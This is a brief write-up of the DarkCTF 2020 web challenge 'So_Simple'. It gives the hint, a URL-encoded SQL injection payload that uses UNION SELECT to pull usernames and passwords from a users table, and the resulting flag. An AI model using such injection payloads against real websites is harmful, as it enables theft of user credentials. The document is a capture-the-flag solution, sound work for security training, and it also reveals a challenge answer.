Cookie Consent by PrivacyPolicies.com

DarkCTF 2020: Web/So_Simple


DarkCTF 2020: Web/So_Simple

Web/So_Simple

173 points

"Try Harder" may be You get flag manually

Try id as parameter

http://web.darkarmy.xyz:30001

Solution

After spending some time on preparing sql injection payload, I've managed finally to create correct one.

http://sosimple.darkarmy.xyz/?id=0%27%20UNION%20ALL%20SELECT%20ID,username,password%20FROM%20users%20WHERE%20username%20like%20%22%{%%22%20OR%20password%20like%20%22%{%%22%20LIMIT%201,2;%20--%20

darkCTF{uniqu3_ide4_t0_find_fl4g}